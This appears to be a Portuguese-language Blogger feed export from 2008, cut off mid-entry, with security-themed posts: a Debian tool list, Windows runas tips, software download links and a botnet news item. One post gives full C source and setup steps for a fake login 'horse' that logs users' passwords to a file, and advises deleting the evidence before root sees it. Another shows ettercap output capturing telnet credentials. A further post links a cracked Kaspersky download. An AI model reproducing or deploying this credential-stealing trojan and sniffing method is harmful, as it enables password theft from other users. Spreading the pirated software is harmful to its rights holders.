<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss'><id>tag:blogger.com,1999:blog-7848027763758575661</id><updated>2009-11-08T10:54:31.465-08:00</updated><title type='text'>Securitty !</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default?start-index=26&amp;max-results=25'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>37</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-2736379631609634409</id><published>2008-08-10T12:05:00.000-07:00</published><updated>2008-08-10T12:09:22.813-07:00</updated><title type='text'>Ferramentas de segurança no Debian</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.eriberto.pro.br/debian/debian_logo.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 172px; height: 228px;" src="http://www.eriberto.pro.br/debian/debian_logo.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;h2&gt;Ferramentas de verificação remota de vulnerabilidades:&lt;/h2&gt;&lt;ul&gt;&lt;li&gt; &lt;p&gt; nessus &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; raccess &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; whisker &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; nikto (substituto de whisker) &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; bass (non-free) &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; satan (non-free) &lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h2&gt;Ferramentas de varredura de rede:&lt;/h2&gt;&lt;ul&gt;&lt;li&gt; &lt;p&gt; nmap &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; xprobe &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; queso &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; knocker &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; isic &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; icmpush &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; nbtscan (para auditorias NetBIOS) &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; fragrouter &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; strobe (do pacote &lt;code&gt;netdiag&lt;/code&gt;) &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; hping2 (&lt;em&gt;Nota:&lt;/em&gt; desatualizado) &lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h2&gt;Redes Privadas Virtuais (VPN):&lt;/h2&gt;&lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;vtun&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;tunnelv&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;cipe&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;vpnd&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;tinc&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;secvpn&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;pptpd&lt;/code&gt; &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;freeswan&lt;/code&gt;, que está obsoleto e substituido por &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt; &lt;p&gt; &lt;code&gt;openswan&lt;/code&gt; (&lt;code&gt;&lt;a href="http://www.openswan.org/"&gt;http://www.openswan.org/&lt;/a&gt;&lt;/code&gt;) &lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-2736379631609634409?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/2736379631609634409/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=2736379631609634409' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/2736379631609634409'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/2736379631609634409'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/08/ferramentas-de-segurana-no-debian.html' title='Ferramentas de segurança no Debian'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-5496841444049796383</id><published>2008-08-10T12:02:00.000-07:00</published><updated>2008-08-10T12:05:27.928-07:00</updated><title type='text'>Kaspersky Internet Security 7.0 [ Cracked ]</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i237.photobucket.com/albums/ff260/dgemg/posts/internet-secu.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://i237.photobucket.com/albums/ff260/dgemg/posts/internet-secu.jpg" alt="" border="0" /&gt;&lt;/a&gt;Kaspersky !! Cracked &lt;strong&gt;Nunca Expira !!!&lt;br /&gt;&lt;/strong&gt;&lt;p style="text-align: justify;"&gt;Anti-vírus com um jogo de componentes para aumentar a sua segurança. O software possui um centro de controle que unem os componentes, permitindo ao operador derrotar a maioria das ameaças de vírus ao seu sistema operacional. Automaticamente pode restaurar arquivos de sistema, retirando vírus e recuperando arquivos infeccionados.&lt;br /&gt;&lt;/p&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;Hospedagem: &lt;strong&gt;Easyshare&lt;/strong&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Tamanho: &lt;strong&gt;31 MB&lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;a href="http://w15.easy-share.com/1701168806.html"&gt;http://w15.easy-share.com/1701168806.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-5496841444049796383?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/5496841444049796383/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=5496841444049796383' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5496841444049796383'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5496841444049796383'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/08/kaspersky-internet-security-70-cracked.html' title='Kaspersky Internet Security 7.0 [ Cracked ]'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-5885637050580932982</id><published>2008-08-07T06:10:00.000-07:00</published><updated>2008-08-07T06:12:18.099-07:00</updated><title type='text'>Crackes adotam Facebook e MySpace para criar rede 'zumbi'</title><content type='html'>Golpes identificados nesta semana pela empresa de segurança Kaspersky mostram que o foco de golpistas da internet está cada vez mais voltado a redes sociais. Depois de divulgar o uso do &lt;a href="http://g1.globo.com/Noticias/Tecnologia/0,,MUL712451-6174,00-FALSO+VIDEO+DA+CANTORA+KELLY+KEY+USA+TWITTER+PARA+ESPALHAR+VIRUS.html"&gt;microblog Twitter para espalhar vírus&lt;/a&gt;, a companhia anunciou fraudes que se aproveitam da popularidade dos sites de relacionamento Facebook e MySpace.&lt;br /&gt;       &lt;br /&gt;Em todos os casos, os golpistas usam essas páginas para divulgar links maliciosos. Nas fraudes baseadas no Facebook e MySpace, os hackers ainda tentam transformar as máquinas invadidas em “zumbis”, para ajudar na propagação dos golpes. Controlados remotamente, esses PCs podem espalhar códigos fraudulentos e mandar spam, por exemplo.&lt;br /&gt;       &lt;br /&gt;O internauta contamina sua máquina quando clica em links sugeridos na página de amigos ou em mensagens internas das redes sociais, também enviadas por conhecidos. A partir daí, o PC infectado passa a divulgar esses mesmos links maliciosos -- sem a interferência do usuário da máquina --, para aumentar a quantidade de vítimas. A praga do MySpace se espalha criando comentários nas contas de amigos do internauta, enquanto a do Facebook produz mensagens de spam e as envia para todos na lista de amigos.&lt;br /&gt;       &lt;br /&gt;Em alguns casos, explica a Kaspersky, são sugeridos links que instalam nas máquinas códigos de rede. Quando o internauta do Facebook clica no endereço infecta seu computador com a praga do MySpace e vice-versa.&lt;br /&gt;&lt;br /&gt;Geralmente escritos em inglês, os textos que induzem as vítimas a clicarem nos links têm variados assuntos: “Paris Hilton arremessa anões nas ruas”, “momentos engraçados”, “você precisa ver isso” e “meu amigo flagrou você com uma câmera escondida”, entre muitos outros. Vale tudo para chamar a atenção do internauta e fazer com que ele clique no endereço sugerido para se tornar a próxima vítima.&lt;br /&gt;       &lt;br /&gt;“Infelizmente, os usuários têm muita confiança no que diz respeito às mensagens deixadas por seus amigos em redes sociais. Portanto, a probabilidade de um usuário clicar em um link como este é muito alta”, disse Alexander Gostev, analista da Kaspersky.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-5885637050580932982?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/5885637050580932982/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=5885637050580932982' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5885637050580932982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5885637050580932982'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/08/crackes-adotam-facebook-e-myspace-para.html' title='Crackes adotam Facebook e MySpace para criar rede &apos;zumbi&apos;'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-8507219261638714247</id><published>2008-07-30T10:54:00.000-07:00</published><updated>2008-07-30T10:57:08.447-07:00</updated><title type='text'>Capturando senhas no Linux</title><content type='html'>&lt;b&gt;Como que funciona ?&lt;/b&gt;&lt;br /&gt;Simples, É simulador de login, o cara que executa-lo encontrará a seguinte tela:&lt;br /&gt;&lt;br /&gt;&lt;span style="color:Red;"&gt;Darkstar Systems 4.2bsd / System V666&lt;br /&gt;&lt;br /&gt;login: admin&lt;br /&gt;Password: ******&lt;br /&gt;&lt;br /&gt;Login Incorrect&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;E ele pensa que deve ter digitado a senha errada, digita de novo e entra no sistema. Porhám akela senha que ele digitou estava certa e foi gravada em um de seus arquivos. Note que este programa há para um sistema bsd4.2, altere as primeiras linhas da fonte (antes de compila-la) para o seu sistema.&lt;br /&gt; Use os seguintes cmds para compila-lo:&lt;br /&gt;&lt;br /&gt;cc horse.c -lcurses -ltermcap&lt;br /&gt;mv a.out horse&lt;br /&gt;&lt;br /&gt; Agora crie um arquivo chamado trap e coloque esses comandos:&lt;br /&gt;&lt;br /&gt;horse&lt;br /&gt;login&lt;br /&gt;&lt;br /&gt; Para executar o trap digite:&lt;br /&gt;&lt;br /&gt;source trap&lt;br /&gt;&lt;br /&gt; Agora atualmente veja o file stuff no seu diretório home. Copie-os e&lt;br /&gt;depois delete o file. Ele pode ser muito incriminante se o root le-lo.&lt;br /&gt; Se você entende de C, pode alterar a fonte como preferir. Porhám se vc&lt;br /&gt;não sabe nada de C, não mexa aà* que vc vai fazer merda.&lt;br /&gt;&lt;br /&gt;----------horse.c------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; /* A mensagem abaixo deve ser alterada para se parecer com a mensagem que o sistema imprime quando pronto. Cada \n representa um carriage return&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; */&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; define SYSTEM "\n\nDarkStar Systems 4.2bsd UNIX (acid0)\n\n"&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; define LOGIN  "login: "&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; define PASSWORD "password:"&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; define WAIT 2&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; define INCORRECT "Login incorrect.\n"&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; define FILENAME "stuff"&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; include &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; include &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; int stop();&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; main()&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; char name[10], password[10];&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; int i;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; FILE *fp, *fopen();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; signal(SIGINT,stop);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; initscr();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; printf(SYSTEM);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; printf(LOGIN);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; scanf("%[^\n]",name);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; getchar();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; noecho();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; printf(PASSWORD);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; scanf("%[^\n]",password);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; printf("\n");&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; getchar();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; echo();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; sleep(WAIT);&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; fprintf(fp,"login %s has password %s\n",name,password);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; fclose(fp);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; }&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; printf(INCORRECT);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; endwin();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; }&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; stop()&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; endwin();&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; exit(0);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; }&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;Pronto xD~&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-8507219261638714247?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/8507219261638714247/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=8507219261638714247' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8507219261638714247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8507219261638714247'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/capturando-senhas-no-linux.html' title='Capturando senhas no Linux'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-8517952922943455808</id><published>2008-07-30T10:39:00.000-07:00</published><updated>2008-07-30T10:54:03.469-07:00</updated><title type='text'>Alternando Entre Contas De Usuário Pelo Prompt</title><content type='html'>Você pode alternar ente usuários pelo Prompt de Comandos do Windows sem precisar realizar o logoff, caso precise acessar pastas e arquivos de outros usuários:&lt;br /&gt;&lt;br /&gt;1. Abra o prompt de comandos;&lt;br /&gt;&lt;br /&gt;2. Digite o seguinte comando: &lt;b&gt;runas /user:*nomedocomputador\*contadeusuário explorer.exe&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Pronto, agora você ira abrir o Windows Explorer, como se fosse o usuário especificado e poderá acessar os arquivos cujo apenas este usuário tenha permissão para acessar.&lt;br /&gt;&lt;br /&gt;OBS: pode ser utilizando de varias formas utilizando o comando &lt;u&gt;runas&lt;/u&gt; .&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&gt; runas /noprofile /user:mymachine\administrator cmd&lt;br /&gt;&gt; runas /profile /env /user:meu_domínio\admin "mmc %windir%\system32\dsa.msc"&lt;br /&gt;&gt; runas /env /user:user@domain.microsoft.com "notepad \"my file.txt\""&lt;br /&gt;&lt;br /&gt;^^&lt;br /&gt;&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-8517952922943455808?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/8517952922943455808/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=8517952922943455808' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8517952922943455808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8517952922943455808'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/alternando-entre-contas-de-usurio-pelo.html' title='Alternando Entre Contas De Usuário Pelo Prompt'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-2182419396703670774</id><published>2008-07-30T10:37:00.000-07:00</published><updated>2008-07-30T10:38:20.544-07:00</updated><title type='text'>Sniffing de atutenticação de telnet</title><content type='html'>O Ettrcap pode ser utilizado para identificar nomes e senhas de usuário com thácnicas de sniffing transmitidas por uma rede durante a autentificação de telnet:&lt;br /&gt;&lt;br /&gt;# ettercap -m -C -N&lt;br /&gt;&lt;br /&gt;ettercap 0.6.7 (c) 2002 AloR &amp;amp; NaGa&lt;br /&gt;&lt;br /&gt;Your IP: 10.0.0.102 with MAC: 01:11:04:03:6A:A3 on Iface: eth0&lt;br /&gt;&lt;br /&gt;Loading plugins... Done.&lt;br /&gt;&lt;br /&gt;Resolving 1 hostname...&lt;br /&gt;&lt;br /&gt;* |=================================================  ======&gt; | 100.00%&lt;br /&gt;Press 'h' for help...&lt;br /&gt;&lt;br /&gt;Sniffing (Mac based): ANY&lt;--&gt; ANY&lt;br /&gt;&lt;br /&gt;TCP + UDP packets... ( default )&lt;br /&gt;&lt;br /&gt;Collecting passwords...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;07:04:58 10.0.0.102:4814 &lt;--&gt; 192.168.1.1:23 telnet&lt;br /&gt;&lt;br /&gt;User: admin&lt;br /&gt;Pass: il0veteln3t&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-2182419396703670774?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/2182419396703670774/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=2182419396703670774' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/2182419396703670774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/2182419396703670774'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/sniffing-de-atutenticao-de-telnet.html' title='Sniffing de atutenticação de telnet'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-1553260348892757022</id><published>2008-07-30T07:59:00.001-07:00</published><updated>2008-07-30T08:02:24.181-07:00</updated><title type='text'>KDE 4.1 Lançado</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.kde.org/announcements/4.1/screenshots/desktop.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://www.kde.org/announcements/4.1/screenshots/desktop.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt; Link :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://dot.kde.org/1217341401/"&gt;http://dot.kde.org/1217341401/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Screenshots:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kde.org/announcements/4.1/screenshots/"&gt;http://www.kde.org/announcements/4.1/screenshots/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Agora vai hein ! xD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-1553260348892757022?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/1553260348892757022/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=1553260348892757022' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1553260348892757022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/1553260348892757022'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/kde-41-lanado.html' title='KDE 4.1 Lançado'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-8745082610946626358</id><published>2008-07-29T08:44:00.000-07:00</published><updated>2008-07-29T08:46:34.065-07:00</updated><title type='text'>K-meleon 3.0</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.danielclemente.com/navega/k-meleon.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 288px; height: 227px;" src="http://www.danielclemente.com/navega/k-meleon.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;K-meleon 3.0, O Navegador Mais Rápido Do Mundo !&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;já que tem a versão 3.5, mais é cheia de bug's, por isso estou colocando a melhor versão aqui !&lt;br /&gt;E como ele é o navegador mais rápido? Veja você mesmo navegando com K-Meleon&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/55631523/cf93accd/K-Meleon_30.html?s=1"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-8745082610946626358?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/8745082610946626358/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=8745082610946626358' title='2 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8745082610946626358'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8745082610946626358'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/07/k-meleon-30.html' title='K-meleon 3.0'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty 